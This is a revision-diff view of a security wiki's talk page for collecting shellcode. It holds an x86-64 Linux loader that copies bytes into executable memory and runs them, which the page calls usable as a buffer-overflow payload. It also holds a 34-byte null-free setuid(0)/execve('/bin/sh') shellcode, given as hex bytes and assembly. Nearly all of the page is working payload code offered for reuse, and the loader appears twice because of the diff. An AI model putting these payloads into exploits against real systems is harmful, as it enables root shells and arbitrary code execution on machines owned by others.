Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Category talk:Shellcode"

From NetSec
Jump to: navigation, search
Line 23: Line 23:
  
 
_start:
 
_start:
 +
pop %rbx  # argc
 +
pop %rbx  # arg0
 +
pop %rbx  # arg1 pointer
  
pop %rbx  # argc
 
pop %rbx  # arg0
 
pop %rbx  # arg1 pointer
 
  
 +
push $0x9
 +
pop %rax
  
push $0x9
+
xor %rdi, %rdi
pop %rax
+
push %rdi
 +
pop %rsi
 +
inc %rsi
 +
shl $0x12, %rsi
  
xor %rdi, %rdi
+
push $0x7
push %rdi
+
pop %rdx
pop %rsi
+
push $0x22
inc %rsi
+
pop %r10
shl $0x12, %rsi
+
# mov $0x1000, %rsi
+
push $0x7
+
pop %rdx
+
push $0x22
+
pop %r10
+
  
push %rdi
+
push %rdi
push %rdi
+
push %rdi
pop %r8
+
pop %r8
pop %r9
+
pop %r9
  
syscall  # The syscall for the mmap().
+
syscall  # The syscall for the mmap().
  
xor %rsi, %rsi
+
begin_inject:
push %rsi
+
xor %rsi, %rsi
pop %rdi     
+
push %rsi
 +
pop %rdi     
  
 
inject_loop:
 
inject_loop:
    cmp %rdi, (%rbx, %rsi, 1)
+
cmp %rdi, (%rbx, %rsi, 1)
    je inject_finished
+
je inject_finished
    mov (%rbx, %rsi, 1), %r10
+
mov (%rbx, %rsi, 1), %r10
    mov %r10, (%rax,%rsi,1)
+
mov %r10, (%rax,%rsi,1)
    inc %rsi
+
inc %rsi
    jmp inject_loop
+
jmp inject_loop
  
 
inject_finished:
 
inject_finished:
    call *%rax
+
call *%rax
  
 
exit:
 
exit:
    push $60
+
push $60
    pop %rax
+
pop %rax
    xor %rdi, %rdi
+
xor %rdi, %rdi
    syscall
+
syscall
 
+
 
</source>}}
 
</source>}}
  

Revision as of 21:40, 1 September 2012

Hey guys, thought we could use some collections of this stuff for re-use purposes. Lets only contribute things we wrote ourselves, no copy pasting others' codes please! Hatter 05:23, 19 August 2012 (MSK)

Collections

c3el4.png This page needs shellcodes, and will be updated with it shortly.

Thanks for your patience.

Windows

Linux

64-bit

Shellcode loader

You shouldn't need to use this algorithm as a buffer overflow payload, but it's null-free just in case. For 64-bit linux kernel 3 systems.

Usage:

  as inject.s -o inject.o ; ld inject.o -o inject
  ./inject "$(echo -en "\x90\x90\x90")"   
  • The above example will execute 3 no ops.
 
.section .data
.section .text
.globl _start
 
_start:
 pop %rbx  # argc
 pop %rbx  # arg0
 pop %rbx  # arg1 pointer
 
 
 push $0x9
 pop %rax
 
 xor %rdi, %rdi
 push %rdi
 pop %rsi
 inc %rsi
 shl $0x12, %rsi
 
 push $0x7
 pop %rdx
 push $0x22
 pop %r10
 
 push %rdi
 push %rdi
 pop %r8
 pop %r9
 
 syscall   # The syscall for the mmap().
 
begin_inject:
 xor %rsi, %rsi
 push %rsi
 pop %rdi    
 
inject_loop:
 cmp %rdi, (%rbx, %rsi, 1)
 je inject_finished
 mov (%rbx, %rsi, 1), %r10
 mov %r10, (%rax,%rsi,1)
 inc %rsi
 jmp inject_loop
 
inject_finished:
 call *%rax
 
exit:
 push $60
 pop %rax
 xor %rdi, %rdi
 syscall
 


setuid(0); execve('/bin/sh'); - 34 bytes

Hatter 05:27, 19 August 2012 (MSK)

  • \x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05
 
.section .data
.section .text
.globl _start
_start:
 mov $0, %rdi
 mov $105, %rax
 syscall
 
# a function is f(%rdi,%rdx,%rsi)
 mov $59, %rax
                # execve(filename, argv, envp)
 push $0x00
 mov %rsp, %rdx # argv is null
 mov %rsp, %rsi # envp is null
 mov $0x0068732f6e69622f, %rcx
 push %rcx
 mov %rsp, %rdi # filename is '/bin/sh\0'
 syscall
 
 mov $60, %rax
 mov $0, %rdi
 syscall